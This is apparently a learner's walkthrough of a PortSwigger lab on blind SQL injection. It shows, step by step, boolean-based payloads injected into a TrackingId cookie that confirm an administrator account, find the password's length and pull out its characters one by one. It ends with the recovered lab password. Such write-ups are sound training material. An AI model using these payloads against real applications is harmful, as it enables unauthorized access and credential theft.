This lab contains a [blind SQL injection](https://portswigger.net/web-security/sql-injection/blind) vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called `users`, with columns called `username` and `password`. You need to exploit the blind [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability to find out the password of the `administrator` user.

To solve the lab, log in as the `administrator` user

# Practical
Let's map out the application by determining how the site works first.
So we have something that is vulnerable to SQL injection.
```html
https://ac251f801e64ba89805538d500c10075.web-security-academy.net/filter?category=Pets
```
Let's append a single quote to see if it breaks the application.
```html
https://ac251f801e64ba89805538d500c10075.web-security-academy.net/filter?category=Pets'
```
No errors, since we're dealing with blind SQL injection, we learned about conditional/boolean statements so let's try and use that.
```html
https://ac251f801e64ba89805538d500c10075.web-security-academy.net/filter?category=Pets' AND 1=3--
```
No errors again, the site just renders normally. Let's look at the request in Burp Suite.
```html
GET / HTTP/1.1
Host: ac251f801e64ba89805538d500c10075.web-security-academy.net
Cookie: TrackingId=UR7rMZdNTCPyaUMt; session=k0mVw6Gz06gcyUGZ5eRIIVtwCNoeDvPT
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://ac251f801e64ba89805538d500c10075.web-security-academy.net/filter?category=Pets
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
```
The description of the labs says that we have to do something with the trackingID cookie, so let's try that.
```html
TrackingId=UR7rMZdNTCPyaUMt'
```
If we set a quote after it, it doesn't return a 'Welcome Back', let's try a boolean statement.
```html
TrackingId=UR7rMZdNTCPyaUMt' AND 1=1--
```
And we get a true statement, and it returns 'Welcome Back'
Let's try a false statement
```html
TrackingId=UR7rMZdNTCPyaUMt' AND (1=2)
```
And we get a false statement, and it returns nothing.
So by this, we can say that it is vulnerable to blind SQL injection. Now let's try to get the password from the admin, but first we need to build a working payload
```html
SELECT(SUBSTRING(SELECT password FROM users WHERE username='administrator'),1,1) ='a
```
Let's add that to our trackingID
```html
TrackingId=UR7rMZdNTCPyaUMt'+AND+(SELECT 'a' FROM users WHERE username='administrator')='a;
```
Okay so there is a user named administrator.
Now let's determine the password length.
```html
UR7rMZdNTCPyaUMt'+AND+(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
```
It returns true, and we get a Welcome back.
Now let's see see if it's false if we make it equal to 1
```html
UR7rMZdNTCPyaUMt'+AND+(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=1)='a
```
And it doesn't return Welcome back.
After trial and error, I managed to determine the password length was 20 characters.
```sql
TrackingId=UR7rMZdNTCPyaUMt'+AND+(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=20)='a;
```
Now we need to determine the password.
Let's start crafting our payload.
```sql
TrackingId=UR7rMZdNTCPyaUMt'+AND+(SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a;
```
Now we just need to change the 'a part to different character or number every time, if it returns true it is a part of the password if its false it is not.
```txt
aonx5dtq1qem72mudsy7
```
There's probably a better way to do it but this is what I got after changing the offset 20 times.